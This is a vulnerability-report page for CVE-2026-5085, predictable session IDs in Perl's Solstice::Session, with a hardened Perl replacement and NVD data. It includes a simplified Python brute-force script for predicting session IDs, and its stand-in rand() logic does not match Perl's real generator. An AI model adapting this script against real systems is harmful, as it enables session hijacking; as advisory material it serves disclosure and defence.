Security Vulnerability Report
CVE-2026-5085 CVSS 9.1 CRITICAL

CVE-2026-5085

Published: 2026-04-13 07:16:51
Last Modified: 2026-04-23 15:02:39
Source: 9b29abf9-4ab0-4765-b253-1875cd9b441e

Description

Solstice::Session versions through 1440 for Perl generate session ids insecurely.

The _generateSessionID method returns an MD5 digest seeded by the epoch time, a random hash reference, a call to the built-in rand() function and the process id.

The same method is used in the _generateID method in Solstice::Subsession, which is part of the same distribution.

The epoch time may be guessed, if it is not leaked in the HTTP Date header. Stringified hash references will contain predictable content. The built-in rand() function is seeded by 16 bits and is unsuitable for security purposes. The process id comes from a small set of numbers.

Predictable session ids could allow an attacker to gain access to systems.
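
The weakness described above, next to a replacement that draws the id from the operating system's CSPRNG. This is an added example, not code from the Solstice distribution: the weak routine is reconstructed from the description, and the helper names and sample values are hypothetical. It assumes the CPAN module Crypt::URandom is installed.

```perl
#!/usr/bin/env perl
use strict;
use warnings;
use Digest::MD5 qw(md5_hex);
use Crypt::URandom qw(urandom);    # CPAN module that reads the OS random source

# Weak pattern, reconstructed from the advisory text (not the module's source):
# the id is a pure function of four values that can be observed or enumerated.
sub weak_id_from {
    my ($epoch, $ref_string, $rand_value, $pid) = @_;
    return md5_hex($epoch . $ref_string . $rand_value . $pid);
}

sub weak_session_id {
    my $ref = {};                   # stringifies as "HASH(0x...)"
    return weak_id_from(time(), "$ref", rand(), $$);
}

# Hardened replacement (hypothetical helper name): 128 bits from the OS CSPRNG,
# hex-encoded so the token has the same length as the MD5-based one.
sub strong_session_id {
    return unpack('H*', urandom(16));
}

# Reject anything that is not a 32-character lowercase hex token before lookup.
sub is_well_formed_id {
    my ($id) = @_;
    return (defined $id && $id =~ /\A[0-9a-f]{32}\z/) ? 1 : 0;
}

# Constructed inputs: the same four values always produce the same id.
my @inputs = (1776064611, 'HASH(0x55d0c0ffee00)', 0.5, 4242);
my $first  = weak_id_from(@inputs);
my $second = weak_id_from(@inputs);
printf "weak id repeatable:  %s\n", ($first eq $second ? 'yes' : 'no');

# Two CSPRNG-backed ids share no inputs and are independent of each other.
my ($s1, $s2) = (strong_session_id(), strong_session_id());
printf "strong ids differ:   %s\n", ($s1 ne $s2 ? 'yes' : 'no');
printf "strong id format ok: %s\n", (is_well_formed_id($s1) ? 'yes' : 'no');
```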

CVSS Details

CVSS Score: 9.1
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:mcrawfor:solstice\:\:session:1440:*:*:*:*:perl:*:* - VULNERABLE
Solstice::Session <= 1440

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
# PoC to demonstrate predicting Session ID by brute-forcing the 16-bit rand seed
import hashlib
import time


def simulate_vulnerable_generation(epoch, pid, seed):
    # Simulate the weak randomness described in the CVE
    # Note: Hash ref content is predictable in context, simplified here as a constant string
    hash_ref_content = "Solstice::Hash=SCALAR(0x12345678)"
    # Simulate rand() with 16-bit seed (simplified logic for demonstration)
    pseudo_random = str((seed * 1103515245 + 12345) & 0x7FFF)
    data = f"{epoch}{hash_ref_content}{pseudo_random}{pid}"
    return hashlib.md5(data.encode()).hexdigest()


def attack(target_session_id, epoch, pid_range):
    print(f"[*] Brute-forcing seed for Session ID: {target_session_id}")
    # Brute force the 16-bit seed space (0-65535)
    for pid in pid_range:
        for seed in range(65536):
            predicted = simulate_vulnerable_generation(epoch, pid, seed)
            if predicted == target_session_id:
                print(f"[+] Found match! PID: {pid}, Seed: {seed}")
                return True
    print("[-] Match not found.")
    return False


# Example Usage
if __name__ == "__main__":
    # Assume we know the timestamp (leaked via HTTP Date) and approximate PID
    current_time = int(time.time())
    target = "5d41402abc4b2a76b9719d911017c592"  # Example hash
    attack(target, current_time, range(1, 1000))

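References

https://metacpan.org/dist/Solstice/source/lib/Solstice/Session.pm#L481 (Product)
https://metacpan.org/dist/Solstice/source/lib/Solstice/Subsession.pm#L105 (Product)
https://security.metacpan.org/docs/guides/random-data-for-security.html (Third Party Advisory)
http://www.openwall.com/lists/oss-security/2026/04/13/2 (Mailing List)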

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-5085", "sourceIdentifier": "9b29abf9-4ab0-4765-b253-1875cd9b441e", "published": "2026-04-13T07:16:50.543", "lastModified": "2026-04-23T15:02:38.933", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Solstice::Session versions through 1440 for Perl generates session ids insecurely.\n\nThe _generateSessionID method returns an MD5 digest seeded by the epoch time, a random hash reference, a call to the built-in rand() function and the process id.\n\nThe same method is used in the _generateID method in Solstice::Subsession, which is part of the same distribution.\n\nThe epoch time may be guessed, if it is not leaked in the HTTP Date header. Stringified hash refences will contain predictable content. The built-in rand() function is seeded by 16-bits and is unsuitable for security purposes. The process id comes from a small set of numbers.\n\nPredictable session ids could allow an attacker to gain access to systems."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "9b29abf9-4ab0-4765-b253-1875cd9b441e", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-338"}, {"lang": "en", "value": "CWE-340"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mcrawfor:solstice\\:\\:session:1440:*:*:*:*:perl:*:*", "matchCriteriaId": "83F100D9-D72B-48D9-9D4A-C1C47B9D19CF"}]}]}], "references": [{"url": 
"https://metacpan.org/dist/Solstice/source/lib/Solstice/Session.pm#L481", "source": "9b29abf9-4ab0-4765-b253-1875cd9b441e", "tags": ["Product"]}, {"url": "https://metacpan.org/dist/Solstice/source/lib/Solstice/Subsession.pm#L105", "source": "9b29abf9-4ab0-4765-b253-1875cd9b441e", "tags": ["Product"]}, {"url": "https://security.metacpan.org/docs/guides/random-data-for-security.html", "source": "9b29abf9-4ab0-4765-b253-1875cd9b441e", "tags": ["Third Party Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2026/04/13/2", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List"]}]}}